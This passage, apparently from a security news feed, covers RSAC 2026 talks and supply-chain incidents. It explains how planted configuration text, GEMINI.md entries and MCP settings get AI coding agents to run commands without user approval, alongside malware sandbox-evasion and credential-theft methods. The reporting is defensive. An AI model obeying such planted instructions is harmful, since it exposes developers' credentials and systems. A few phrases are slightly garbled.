A panel at the RSAC 2026 Conference, titled "We Think It Was Them: The Perils of Attribution in Public Statements," evaluated these operational decisions. Axios reporter Sam Sabin hosted the discussion, which featured FTI Consulting senior advisor Brett Callow, Institute for Security and Technology chief strategy officer Megan Stifel, and Cooley LLP partner Mike Egan. They addressed the probabilistic nature of attribution, the criteria for public statements, and the potential consequences of attempting to name a threat actor.

## Misconceptions surrounding threat actor attribution

Callow stated that a recurring misconception about attribution is treating the process as definitive rather than probabilistic. He noted that investigations usually conclude it is "more likely than not that a particular entity was responsible, but that nuance doesn't always get carried out."

Egan agreed, observing that absolute certainty regarding unauthorized access is rare unless the threat actor intentionally seeks visibility. This is further complicated by the documented propensity for entities like ransomware groups to lie and claim responsibility for incidents they did not conduct.

Egan also shared that some legal clients operate under the misconception that attributing an incident to a sophisticated nation-state will divert responsibility from the defending organization and improve the public narrative.

"We've had instances of that in the past where the FBI has come out and told the company, 'Listen, 99% of companies wouldn't be able to withstand this attack. This is a pure nation-state attack.' I get the attraction behind that, but it changes the narrative a bit and then can make some people a little bit more concerned," Egan explained. "Now all of a sudden, we're not talking about just a personal data breach and something bigger, and that story sticks around longer."

## Attribution and operational risk

While establishing a firm attribution profile can seem appealing, the panelists advised organizations to weigh the secondary consequences. Callow described definitive public attribution as "extremely risky" because it introduces third parties into the operational narrative. "That could be a nation or it could be a for-profit criminal enterprise. In either case, whatever you say to them can attract considerable blowback and invite comments," he said.

The panel also addressed how attribution can directly impact cyber insurance coverage. Following the NotPetya ransomware incidents in 2017, some insurance providers initially denied claims from affected organizations. The insurers argued that the policies did not cover acts of war, given that the activity was directed at Ukraine before spreading globally and was attributed to Russian nation-state actors tracking as Sandworm.

Despite these concerns, there are also risks to remaining silent. Stifel, who previously served as an attorney in the National Security Division at the US Department of Justice, noted that declining to make an attribution case might unintentionally signal acceptance of the unauthorized behavior.

Sabin prompted the panel on how to handle situations where an affected organization is not ready to make a concrete attribution, but external pressures—such as media leaks—force the issue. Premature attribution carries clear risks, yet organizations generally need to maintain control over their own communication narratives.

The panelists offered differing strategies for this scenario. Stifel recommended acknowledging that the organization is aware of the reports, confirming that an incident occurred, and stating that the investigation is ongoing. Egan advocated for a stricter legal approach, advising clients to hold the "no comment" line while the internal investigation proceeds. "Oftentimes the best answer is no answer. We're concentrating on the investigation," Egan said.

Callow offered a different perspective on filling the communication gap.

"I don't think 'no comment' is ever a good response. If you don't fill that gap, somebody else will," he said. "You don't necessarily have to attribute the attack, but you should, for example, say the investigation is ongoing."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>European officials lead AI and regulatory discussions at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/c2f45872-d53f-4ca7-b5df-0d10ebd7e86f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c2f45872-d53f-4ca7-b5df-0d10ebd7e86f</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:48 GMT</pubDate>
        <description>Following the withdrawal of US federal agencies from RSAC 2026, European cybersecurity leaders engaged the private sector to establish security standards for AI-generated code and prepare for the upcoming EU Cyber Resilience Act.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, European cybersecurity leaders led regulatory and technical discussions following the notable absence of US government officials. Representatives from the FBI and the NSA withdrew from the event, a significant shift from previous years when leaders such as former DHS Secretary Kristi Noem (2025) and Secretary of State Antony Blinken alongside DHS Secretary Alejandro Mayorkas (2024) attended to provide guidance to the private sector.

Reports indicate the withdrawal of US federal agencies followed the conference's decision to hire former CISA Director Jen Easterly as CEO. This shift in participation occurs during a period of complex global security challenges, including ongoing nation-state cyber operations originating from Iran, the development of quantum computing, and the critical need to establish safety parameters for artificial intelligence.

## Establishing guardrails for AI-generated code

With US officials not in attendance, European leaders prioritized proactive defense and collaboration with the technology sector. Dr. Richard Horne, chief executive of the UK's National Cyber Security Centre, used his keynote presentation to advocate for security standards in "vibe coding"—the use of AI to generate software code. Horne noted the productivity benefits of AI tools but emphasized the responsibility of security professionals to make these technologies a net positive for digital safety.

Because vibe coding lowers the barrier to software creation, its adoption is accelerating rapidly. Horne advised the industry to build security into the foundation of these tools to prevent the introduction of unintended vulnerabilities before adoption scales further.

"The attractions of vibe coding are clear, and disrupting the status quo of manually produced software that is consistently vulnerable is a huge opportunity, but not without risk of its own," he stated. "The AI tools we use to develop code must be designed and trained from the outset so that they do not introduce or propagate unintended vulnerabilities."

## Preparing for the EU Cyber Resilience Act

European Union regulators also engaged the private sector regarding upcoming compliance requirements, specifically the EU Cyber Resilience Act, scheduled to take effect in December 2027. Despina Spanou, deputy director general for networks and technology–cybersecurity coordination at the European Commission DG CNECT, and Christiane Kirketerp de Viron, director for digital society, trust, and cybersecurity, outlined the proposed regulations and gathered feedback from industry partners.

Addressing concerns about regulatory friction, Spanou compared the upcoming changes to the 2018 rollout of the GDPR, noting that initial industry anxieties did not materialize into systemic disruptions. The officials emphasized that securing the technology supply chain is their primary focus, especially as AI integrations become more prevalent. Spanou advised the private sector to view cybersecurity as a comprehensive defense strategy that extends beyond data systems to include physical assets like drones.

Edvardas Šileris, head of the European Cybercrime Centre (EC3) at Europol, discussed his organization's capacity for proactive mitigation against threat actors and encouraged deeper collaboration with private organizations.

When asked whether the US remains a reliable partner for Europe given the current dynamics, Šileris and Kirketerp de Viron declined to comment directly. Spanou provided the sole response, reiterating the position of EU President Ursula von der Leyen: "The American people will always be our friends."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing Developer Environments Against Emerging Supply Chain and AI Assistant Vulnerabilities</title>
        <link>https://security.shortwaves.live/blog/f3e433a5-2991-472c-a735-1c7993bbe9c1</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f3e433a5-2991-472c-a735-1c7993bbe9c1</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>Recent supply chain incidents and newly identified vulnerabilities in AI coding assistants present significant risks to developer workstations. By enforcing strict isolation for AI-automated tasks and adopting proactive secret management, security teams can effectively safeguard the software development life cycle from unauthorized access.</description>
        <content:encoded><![CDATA[
            Recent interconnected supply chain incidents and newly disclosed vulnerabilities require immediate attention from security teams protecting developer workstations. While organizations frequently prioritize hardening production environments, developments involving Checkmarx, Aqua Security, and widely used AI coding assistants show that unauthorized parties are shifting focus to the software development life cycle (SDLC). By compromising trusted development tools, these groups aim to establish access during the earliest stages of software creation.

Immediate remediation is necessary for a widening supply chain incident attributed to the threat group TeamPCP. Following unauthorized access to Aqua Security’s Trivy project, Checkmarx reported this morning that unauthorized parties modified its "Keeping Infrastructure as Code Secure" (KICS) GitHub Action and two VS Code plugins. This campaign has rapidly expanded to include the Litellm Python package on PyPI, a component integrated into an estimated 36% of modern cloud environments for AI development. Organizations running automated pipelines using the affected KICS action during a four-hour window on March 23, or downloading the compromised VS Code plugins from the OpenVSX registry on that date, must treat their environments as exposed.

The technical mechanics of these incidents center on credential exfiltration. TeamPCP leveraged compromised privileged credentials and automated service accounts to inject credential-harvesting software into dozens of software versions. Once active, this software targets sensitive data, including SSH keys, cloud provider credentials, API tokens, and Docker configurations. This creates a "snowball effect", a term the threat group used in public Telegram messages—where stolen secrets from one exposure immediately enable subsequent access. The inclusion of the Queen song "The Show Must Go On" in their deployment metadata indicates the group plans to maintain focus on popular open-source projects.

Alongside risks to code-scanning utilities, researchers sharing data at the RSAC 2026 Conference detailed systemic vulnerabilities in the tools used to write code. The rapid adoption of AI coding assistants, including Claude Code, Cursor, and Google’s Gemini—introduces architectural changes that bypass traditional endpoint detection and response (EDR) and browser isolation. Because these AI agents require deep access to local filesystems and developer configurations to function, they operate with elevated permissions that complicate standard endpoint security measures.

Analysis from the conference details how these tools interpret configuration metadata as active instructions. In one high-severity flaw affecting Claude Code (CVE-2025-59536), unauthorized parties can manipulate "hooks", user-defined shell commands—to execute code before a user accepts a trust dialog. Similarly, the Cursor platform contains a remote code execution vulnerability (CVE-2025-54136) where authorization for a plugin is bound to its name rather than a cryptographic hash. This allows a benign, approved command to be swapped for an unauthorized one after the developer grants permission. These vulnerabilities turn AI assistants into unintended access points, processing "Configuration as Code" in ways that existing security products struggle to monitor or distinguish from routine developer activity.

The scale of this risk is compounded by "TroyDen's Lure Factory," a massive operation recently identified by Netskope Threat Labs. This campaign uses AI-generated lures to distribute over 300 compromised GitHub packages, ranging from AI deployment tools like OpenClaw to gaming utilities and VPN software. The operation relies on a dual-component design: a renamed Lua runtime paired with an encrypted script. When analyzed individually, these files appear benign to automated sandboxes. Executed together, they trigger anti-analysis checks. Including a 29,000-year "sleep" delay to outlast timed sandboxes—before exfiltrating full-desktop screenshots and credentials to a command-and-control server in Frankfurt.

We recommend an immediate strategy shift for defensive teams. The priority for any organization potentially exposed during the Checkmarx or Litellm incidents is a comprehensive rotation of all secrets. This includes personal access tokens (PATs), cloud IAM keys, and API credentials. Because the credential-harvesting software targets a broad range of tokens, partial rotation is insufficient; defenders should proceed under the assumption that all secrets present on a developer's workstation or within a CI/CD environment at the time of the incident are compromised.

In addition to reactive secret rotation, the vulnerabilities in AI assistants necessitate a transition toward zero-trust developer environments. Security teams should treat developer workstations as a critical perimeter and enforce strict isolation for AI-automated tasks. Executing AI-driven shell commands within a sandbox is now a foundational requirement for securing these workflows. Organizations must also adopt policies where configuration files (.env,.json,.toml) undergo the same scrutiny as executable binaries. Any GitHub-hosted download pairing a renamed interpreter with an opaque data file should prompt manual contextual review, as these are primary indicators of the stealthy LuaJIT-based threats observed in the "Lure Factory" campaign.

The convergence of automated distribution networks and vulnerable AI agents indicates that the volume of supply chain risks will soon outpace traditional manual triage. Threat groups are successfully using AI to scale their infrastructure and identify subtle bypasses in developer workflows. The collaboration between groups like TeamPCP and extortion units like LAPSUS$ suggests that credential theft serves as the entry point for lateral movement and data ransom.

At this stage, the exact mechanism for the unauthorized code injection in the Checkmarx KICS action remains under investigation, and several CVSS scores for the newly disclosed AI assistant vulnerabilities are still pending. As the industry processes these disclosures, protecting the developer environment requires moving beyond automated scanning to proactive secret management and behavioral isolation. We work with security teams to implement these controls and safeguard the software development life cycle.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat actors distribute compromised GitHub packages using OpenClaw and gaming lures</title>
        <link>https://security.shortwaves.live/blog/3955be3e-eb63-4668-a299-9be186c07c3e</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3955be3e-eb63-4668-a299-9be186c07c3e</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>A large-scale operation tracked as &quot;TroyDen&apos;s Lure Factory&quot; is distributing more than 300 compromised GitHub packages via artificial intelligence-generated lures. Security teams must look beyond automated sandbox analysis to identify these dual-component threats before they enter the software supply chain.</description>
        <content:encoded><![CDATA[
            A widespread campaign leveraging AI-assisted generation is distributing more than 300 compromised GitHub packages to developers and general users. Identified by Netskope Threat Labs, the operation, tracked as "TroyDen's Lure Factory," operates across multiple repositories on the platform and conceals malicious components behind a variety of software lures.

These lures include deployment files for the OpenClaw AI tool, a Telegram-promoted phone tracker, a Fishing Planet game utility, Roblox scripts, cryptocurrency tools, and VPN software. The common mechanism across these packages is a LuaJIT-based unauthorized component designed to perform system geolocation, capture screenshots, and exfiltrate sensitive data.

Netskope first discovered the packages in a GitHub repository distributing a custom LuaJIT tool engineered to evade automated detection systems.

"The repository impersonated a Docker deployment tool for a legitimate AI project to deploy containerized OpenClaw, using the real upstream repository, a polished README, and a github.io page to appear authentic," Netskope senior staff threat research engineer Vini Egerland wrote in the published report.

## Establishing false legitimacy

To build credibility, the operation targets users seeking simple installations of the OpenClaw project. The repository featured a detailed README with installation instructions for both Linux and Windows environments.

The threat actors took significant steps to make the repository appear authentic. They listed multiple contributors, including an invitation to a developer with a highly starred repository during a private pre-launch phase. This developer subsequently contributed functional code to the project, likely in good faith.

Further investigation connected the creator to additional packages hosted across multiple GitHub repositories, totaling more than 300 confirmed compromised packages affecting diverse user bases simultaneously. Netskope reported the malicious projects to GitHub on March 20. At the time of the initial report, two repository lures, the "Fishing Planet Cheat Menu" and the "phone-number-location-tracking-tool"—remained active.

## Component execution and evasion

The malicious software utilizes a two-component design: a renamed Lua runtime paired with an encrypted script. Netskope found that each component passes automated sandbox analysis when submitted individually.

"The threat only emerges when both components execute together, resulting in five anti-analysis checks, a sleep delay of roughly 29,000 years to defeat timed sandboxes, and an immediate full-desktop screenshot exfiltrated as soon as it executes, and credential theft behaviour," Egerland wrote.

Once active, the software exfiltrates collected data to a command-and-control (C2) server located in Frankfurt. The tool also embeds credential-theft capabilities, indicating a risk for lateral movement and further system compromise.

Evidence indicates the threat actors used operational AI to scale the campaign's infrastructure. The lure names systematically apply obscure biological taxonomy, archaic Latin, and medical terminology across the ecosystem. This approach demonstrates a shift toward using automated, AI-driven processes to build scalable threat environments, moving away from isolated incidents toward continuously generated threat infrastructure.

## Defending the development pipeline

This operation exposes a specific gap in standard automated analysis pipelines, requiring security teams to apply contextual review to protect the software development life cycle. If developers incorporate a compromised package into legitimate software, the broader supply chain faces risk unless the code is identified before reaching an operational environment.

"The result is a threat designed to pass every automated layer. individual file submission, behavioral sandbox, hash matching — and surface only when a human analyst runs everything together in context," Egerland noted.

The sheer volume and breadth of the lures indicate the threat actor prioritizes scale over precision targeting. To defend against this methodology, organizations should treat any GitHub-hosted download that pairs a renamed interpreter with an opaque data file as a high-priority triage candidate, regardless of the surrounding repository's apparent legitimacy.

A comprehensive list of indicators of compromise (IOCs), including hashes, endpoint patterns, and associated GitHub accounts, is available in the Netskope report to assist security teams with detection and blocking rules.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Reevaluating endpoint security in the era of AI coding assistants</title>
        <link>https://security.shortwaves.live/blog/c5541bb8-ff50-42d4-89ad-5fac0f527b5d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c5541bb8-ff50-42d4-89ad-5fac0f527b5d</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>Recent research presented at RSAC 2026 identifies systemic vulnerabilities in popular AI coding assistants that bypass traditional endpoint defenses. By adjusting configurations and establishing zero-trust policies for developer environments, organizations can safely integrate these tools while maintaining reliable security visibility.</description>
        <content:encoded><![CDATA[
            Artificial intelligence development tools are introducing fundamentally new client-side risks, requiring the security industry to update how it monitors and protects developer environments.

During a session at the RSAC 2026 Conference in San Francisco, Oded Vanunu, chief technologist at Check Point Software, detailed how the architecture of AI coding assistants inadvertently bypasses modern endpoint defenses. The session, titled "When AI Agents Become Backdoors: The New Era of Client-Side Threat," outlined a series of vulnerabilities discovered in tools including Anthropic's Claude Code, OpenAI's Codex, Google's Gemini, and Cursor.

Vanunu and his research team spent the past year evaluating AI development tools. They found that the rapid adoption of these agents is shifting the security situation, bypassing many of the protections the cybersecurity industry has built over the past decade to secure endpoints and transition application execution to the cloud.

## Understanding the endpoint visibility gap

Over the past 20 years, security teams successfully reduced client-side risk through operating system hardening, sandboxing, endpoint detection and response (EDR), and browser isolation. The transition to software-as-a-service (SaaS) effectively turned endpoints into thin clients, significantly reducing the available surface for unauthorized access.

However, AI coding assistants require deep access to local filesystems and developer configurations to function effectively. Because developers typically assign these tools high privileges and broad network access, the agents establish operational pathways that bypass traditional security boundaries. Furthermore, because these tools operate autonomously and with elevated permissions, conventional security technologies struggle to monitor their actions or distinguish routine tasks including unauthorized activity.

According and Vanunu, security products currently lack the visibility required to understand or control agentic AI behavior at the endpoint.

Compounding this visibility gap is how AI tools interpret configuration files. These agents process configuration metadata as active execution instructions. While developers are typically cautious when handling executable files, they exercise less oversight over configuration formats like.json,.env, or.toml. Malicious actors can insert seemingly benign text into configuration metadata, instructing the agent to run unauthorized commands. This dynamic allows threat actors to utilize standard configuration files rather than traditional malicious software.

## Identified vulnerabilities in AI assistants

Vanunu’s team identified six specific vulnerabilities across popular AI coding platforms. The respective vendors have since patched these flaws.

In Claude Code, researchers discovered a high-severity flaw (CVE-2025-59536) that allows an unauthorized party to manipulate the tool into executing hidden code before the user accepts the startup trust dialog. This vulnerability can be used to manipulate Claude Code Hooks—user-defined shell commands designed to run automatically—thereby bypassing EDR products. Additionally, researchers demonstrated a model context protocol (MCP) consent bypass. While Claude requires user consent before executing MCP server plug-ins, Claude Code reads configurations automatically, allowing unauthorized MCP servers to run commands before the trust dialog appears.

In the OpenAI Codex CLI, the team identified a code injection vulnerability (CVE-2025-61260, CVSS score pending). This flaw allows a modified project.env file to redirect the CLI to a local.toml configuration file. The configuration then connects to unauthorized MCP servers, prompting the coding tool to execute commands immediately without human oversight.

The researchers also documented CVE-2025-54136, a high-severity remote code execution (RCE) vulnerability in the Cursor coding platform. When a developer approves an MCP server command, Cursor binds that authorization to the plug-in's name rather than the specific content hash of the approved action. This discrepancy enables a swap technique: an unauthorized party can submit a benign command for approval, then update the plug-in with unauthorized instructions once authorization is granted.

Finally, the session detailed an unassigned flaw in Google's Gemini CLI. This vulnerability allows unauthorized commands to be disguised as legitimate scripts within documentation files. If an embedded command is placed in a GEMINI.md file, the tool executes it silently without requiring user approval.

## Securing the developer perimeter

While the four vendors have addressed these specific vulnerabilities, the findings illustrate new paths for unauthorized access and emphasize that developer workstations now represent a critical security perimeter.

To safely deploy AI coding assistants, Vanunu recommends organizations take immediate steps to evaluate their environments:

1. Conduct a comprehensive audit to identify all AI technology currently in use, actively looking for unauthorized or "shadow AI" tools.

2. Analyze all project metadata and configuration files for suspicious or undocumented content.

3. Require isolation for coding tools, ensuring that all AI-automated shell tasks execute within strict sandbox environments.

4. Adopt a "Configuration = Code" policy for developer workstations, treating these environments with zero-trust principles where no text is executed without explicit verification.

By applying these controls, security teams can redesign their defense strategies to support developer productivity while maintaining rigorous protection over local and cloud environments.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Checkmarx KICS and VS Code plugins affected by widening supply chain security incident</title>
        <link>https://security.shortwaves.live/blog/9f3cbe61-909a-4fdf-972d-81136daad191</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/9f3cbe61-909a-4fdf-972d-81136daad191</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:18 GMT</pubDate>
        <description>Following a recent incident involving the Trivy security scanner, threat actors have introduced infostealing malware into Checkmarx KICS, OpenVSX plugins, and the Litellm Python package. Organizations can protect their CI/CD pipelines by identifying exposed secrets and rotating credentials immediately.</description>
        <content:encoded><![CDATA[
            Following a recent supply chain security incident affecting the Aqua Security-maintained Trivy project, Checkmarx disclosed that unauthorized parties modified a version of Keeping Infrastructure as Code Secure (KICS), its open-source static code analysis project.

Threat actors gained unauthorized access to the KICS GitHub Action—a tool organizations use to run security scans within CI/CD pipelines—and introduced unauthorized code into multiple software versions. Checkmarx noted that any organization with automated pipelines configured to run this action during a four-hour window on the morning of March 23 could be affected.

That same day, unauthorized versions of two Checkmarx VS Code plug-ins appeared on the OpenVSX registry, where they remained available for download for approximately three hours.

This disclosure follows closely behind Aqua Security's report of a related incident. In that case, a threat actor used previously stolen privileged credentials to insert an infostealer into 76 previously released versions of Trivy's GitHub Action. The actor also used a compromised automated service account to publish two unauthorized Docker images.

Security researchers attribute the malware in both incidents to TeamPCP, a threat group known for automated credential theft targeting cloud infrastructure.

## Expanding scope across software registries

The campaign has since expanded to other package ecosystems. GitGuardian researchers reported that the same threat actor introduced the infostealer into the PyPI software registry, affecting versions 1.82.7 and 1.82.8 of the Litellm package. PyPI maintainers have since removed the affected files.

The infostealer is designed to exfiltrate a wide range of sensitive data, including SSH keys, cloud credentials, API tokens, Docker configurations, and cryptocurrency wallet information. Because many organizations rely on Litellm to build AI-powered applications, the potential scope of impact is significant. Guillaume Valadon, a cybersecurity researcher at GitGuardian, noted that Litellm receives millions of downloads daily, elevating the priority of the incident.

Valadon emphasizes that threat actors are actively pursuing developer secrets. To mitigate this risk, security teams should maintain a real-time inventory of their secrets, enabling rapid revocation during an incident before lateral movement can occur.

## Recommended actions for security teams

Checkmarx is currently investigating the incident and actively working to ensure all malicious artifacts are permanently removed from OpenVSX. While the company has not publicly detailed the exact mechanism of the unauthorized code, the behavior aligns with an infostealer.

Checkmarx strongly recommends that any organization whose automated build pipelines may have interacted with the affected plug-ins immediately rotate all access keys, personal access tokens (PATs), and login credentials.

## Shared indicators and ongoing threat activity

Security researchers confirm that the Trivy, Checkmarx, and Litellm incidents share operational links. Valadon pointed out common indicators of compromise (IoCs) across the events, including the public key used for data exfiltration, the specific targeted services, and the persistence techniques employed.

Wiz Research, which is independently tracking the campaign, corroborated the TeamPCP attribution. Ben Read, a lead researcher at Wiz, stated that their telemetry indicates a common actor across the compromises. Wiz researchers estimate that liteLLM is present in 36% of modern cloud environments.

By targeting security scanners and AI development tools, these threat actors aim to establish a presence in highly sensitive stages of the software development life cycle. Wiz also noted indications that TeamPCP may be collaborating with the LAPSUS$ extortion group to expand their operations.

The threat actors left a link to the Queen song "The Show Must Go On" in their deployment, and public Telegram messages from the group reference a "snowball effect" alongside future targets across popular open-source projects, indicating that organizations should remain vigilant and proactively rotate exposed credentials.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing the Supply Chain and AI Integration: Analysis of the Trivy Exposure and PureLog Campaign</title>
        <link>https://security.shortwaves.live/blog/8030b0a7-dc50-4c60-b585-6eab2c669a54</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/8030b0a7-dc50-4c60-b585-6eab2c669a54</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:47 GMT</pubDate>
        <description>Recent security incidents affecting the Trivy CI/CD ecosystem and ongoing PureLog infostealer campaigns require immediate attention and specific configuration changes. Alongside these active developments, early trials of AI integration in security operations show measurable efficiency gains, provided organizations implement strict human-on-the-loop governance.</description>
        <content:encoded><![CDATA[
            As security leaders convene in San Francisco for RSAC 2026, discussions are moving from the theoretical applications of artificial intelligence to the practical realities of operational integration. Briefings this week outline a complex environment: while AI reduces analyst workloads, the underlying infrastructure organizations rely on to secure code faces persistent pressure. A recent software supply chain incident affecting the Trivy security scanner demonstrates that as defense automation increases, the tools themselves become high-value focal points for sophisticated data collection efforts.

The most pressing development for DevOps and security engineering teams involves a multi-stage software supply chain event impacting the open-source Trivy ecosystem. Over the past 24 hours, details emerged regarding an unauthorized party who compromised Trivy’s GitHub Action components to collect sensitive CI/CD secrets. The sequence, beginning with token theft in early March, escalated on March 19 when the actor force-pushed unauthorized code to nearly every released version of `trivy-action`. This action bypassed the trust models commonly associated with version tags. Because many automated pipelines rely on mutable tags like "v1" rather than immutable commit SHAs, these environments unknowingly pulled and executed unauthorized code designed to collect cloud credentials, SSH keys, and Kubernetes tokens.

The technical mechanics of this incident require careful attention from defensive teams. A malicious actor used a compromised automated service account, `aqua-bot`, to publish modified Docker images (v0.69.5 and v0.69.6) and manipulated GitHub Action tags to introduce a credential-collection script. This script scans more than 50 filesystem locations for credentials across AWS, Azure, and Google Cloud, alongside database keys and cryptocurrency wallets. If the script cannot transmit data to its primary external infrastructure, it uses a secondary method: attempting to create a public repository named `tpcp-docs` within the affected organization's own GitHub environment to host the data. This technique shows a shift toward using an organization's trusted environment to stage sensitive information.

While the Trivy event affects supply chains, a localized phishing campaign is currently testing endpoint defenses across the government, healthcare, and hospitality sectors. Unauthorized parties are distributing the PureLog infostealer using deceptive copyright infringement notices customized to the recipient's local language. Observed affecting organizations in Canada, Germany, the US, and Australia, this campaign uses a multi-stage, fileless execution process to avoid detection. After a user opens what appears to be a PDF, a Python-based loader performs environment checks for sandboxes before transferring execution to two successive.NET loaders. These components eventually launch PureLog directly into memory, utilizing AMSI bypass techniques and heavy code obfuscation to bypass traditional antivirus and forensic analysis.

Alongside these active developments, enterprise leaders at RSAC 2026 shared outcomes from six-month AI trials, offering a framework for safer automation. Security teams in the manufacturing and financial sectors reported that integrating Large Language Models (LLMs) into the SOC improved the mean time to discovery (MTD) by up to 36% and reduced analyst fatigue through automated context-gathering and documentation. However, these efficiency gains carry caveats: fully autonomous AI remains unreliable for high-stakes decisions. During one trial within a financial SOC, an autonomous model struggled with ambiguous data signals and incorrectly removed authorized users from the network.

The consensus among these leaders points toward a "human on the loop" model for scaled operations. Vodafone, for example, utilizes an "AI Booster" platform to centralize machine learning models, enabling privacy and security teams to enforce consistent guardrails. For defensive teams, the guidance is specific: AI should operate in a read-only capacity for triage and summarization, requiring strict human approval gates for any action that impacts system access or production equipment. In manufacturing environments, this requires ensuring AI cannot interact directly with PLCs or SCADA systems, preventing automated errors including causing physical safety events.

For teams responding and these developments, conducting a thorough audit of the software supply chain is a priority. We advise any organization that utilized `trivy-action` or `setup-trivy` between March 19 and March 23 to operate under the assumption that their CI/CD secrets are exposed. The immediate rotation of all accessible credentials, including cloud provider keys and SSH tokens, is the primary path to remediation. To prevent similar recurrences, we recommend reconfiguring pipelines to pin GitHub Actions to full, 40-character commit SHAs instead of version tags. SHAs are immutable and prevent unauthorized code from being force-pushed to an existing label.

Regarding the PureLog campaign, defensive efforts should prioritize behavioral detection over static signatures. Monitoring for the suspicious use of legitimate tools, such as WinRAR for component extraction, and restricting unauthorized Python execution on endpoints can disrupt the initial stages of the infection sequence. Security teams should also tune EDR and XDR platforms for memory scanning to detect the fileless transition including the.NET loaders and the final PureLog execution.

The relationship between security tools and the environments they protect requires careful management. The transition toward "agent-assisted" defense, discussed by leaders from Google and PayPal, acknowledges that manual processes struggle to match automated event volumes. However, this shift necessitates a "zero trust" approach to security tools themselves. Evaluating an AI model or a vulnerability scanner with the same scrutiny applied to a third-party vendor is now a foundational requirement for maintaining integrity in automated enterprises.

The full extent of data transferred during the Trivy exposure window remains under investigation. While the presence of a "tpcp-docs" repository serves as a clear indicator of compromise, more stealthy data transfer may have occurred before the fallback mechanism activated. We advise security teams to continuously monitor cloud environment logs for unusual API calls or credential usage originating from CI/CD service accounts over the coming weeks.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat actors conceal PureLog infostealer in copyright infringement notices</title>
        <link>https://security.shortwaves.live/blog/fbd65e65-0179-44e5-b3de-4f515255bce6</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fbd65e65-0179-44e5-b3de-4f515255bce6</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:46 GMT</pubDate>
        <description>A targeted phishing campaign is using localized copyright infringement notices to distribute the PureLog infostealer. By employing a multi-stage, fileless execution process, threat actors aim to bypass traditional defenses and access sensitive data in critical sectors.</description>
        <content:encoded><![CDATA[
            Threat actors are using copyright-infringement notices to target multiple industry sectors in a fileless phishing campaign that distributes information-stealing malware.

The campaign, aimed at organizations in critical sectors, including healthcare, government, hospitality, and education—attempts to install PureLog Stealer, a low-cost infostealer considered accessible for unauthorized parties to operate, according to a report by Trend Micro.

Primarily, the operation has targeted healthcare and government organizations in Germany and Canada. Trend Micro threat researchers Mohamed Fahmy, Allixon Kristoffer Francisco, and Jonna Santos noted that this indicates selective targeting and a structured, evasive delivery framework rather than simple mass malware distribution. Organizations in the US and Australia were also targeted.

For initial access, threat actors rely on phishing emails that deceive recipients via a sense of urgency into downloading a malicious executable, which is tailored to the recipient's local language. This targeted delivery increases the apparent authenticity of the message and the likelihood of execution.

Recipients of the emails often believe they are reviewing a legal notice informing them of copyright violations. Instead, users manually execute what appears to be a PDF file. This initiates the execution of PureLog via a multistage, in-memory process that relies on multiple loaders and features a series of evasive maneuvers, including a bypass for Windows Defender's Antimalware Scan Interface (AMSI), anti-virtual machine techniques, and heavy code obfuscation.

The researchers note that the campaign uses a combination of social engineering, staged malware delivery, and in-memory execution to evade both detection and forensic analysis.

## Phishing sequence designed for evasion

The intrusion sequence is designed from start to finish with a focus on evading detection by users and security teams. Opening the attachment or clicking on the link leads to a compressed archive containing what looks like a benign document, typically a PDF file. The archive also contains supporting files required for execution and a renamed legitimate tool, such as WinRAR, which is used to extract and launch components.

The execution flow features a two-stage loader process. The first loader, which is Python-based, initiates the sequence with an environmental check to detect sandbox or virtual machine environments. Further decryption of the malicious components then occurs through two successive.NET loaders. According to Trend Micro, these loaders obfuscate the execution flow and delay full exposure to the malware.

The Python‑based loader and dual.NET loaders introduce redundancy and fileless execution pathways, ensuring that the final PureLog Stealer component launches reliably without leaving standard artifacts on the disk.

## PureLog as the final component

As a further evasion tactic, the malware retrieves decryption keys from a remote server at runtime. This ensures that the components remain encrypted while not in execution mode, preventing security analysts from extracting the final malware without live execution.

This mechanism sets up the final deployment of the PureLog executable. It runs directly in memory—leaving scarcely an artifact trail, and bypasses many traditional defenses. Throughout the entire process, the malware uses AMSI bypass techniques, heavy code obfuscation, and anti-analysis checks to maintain stealth.

Once activated, the PureLog infostealer establishes persistence via registry modifications, captures screenshots, profiles the system, and harvests sensitive data. This includes Chrome browser credentials, browser extensions, cryptocurrency wallets, and system information.

Given its stealthy execution and layered delivery, successful compromise of a targeted system can result in credential theft, account takeover, and downstream unauthorized activity.

## Defending against evasive phishing

With phishing campaigns becoming more complex through targeted social engineering and sophisticated evasion tactics—amid a heightened geopolitical environment, it is critical for organizations to remain highly vigilant.

The evasion and obfuscation measures of the PureLog campaign, along with the in-memory execution of the malware, demonstrate the necessity of behavioral detection, network telemetry, and proactive threat hunting. This activity reflects a shift away from broad, opportunistic malware distribution toward more selective targeting across multiple countries.

To protect their environments, organizations can configure email filters to flag or sandbox messages containing legal threats and unexpected attachments. Security awareness training should also help users recognize unexpected legal or financial claims in their inboxes as high-risk items.

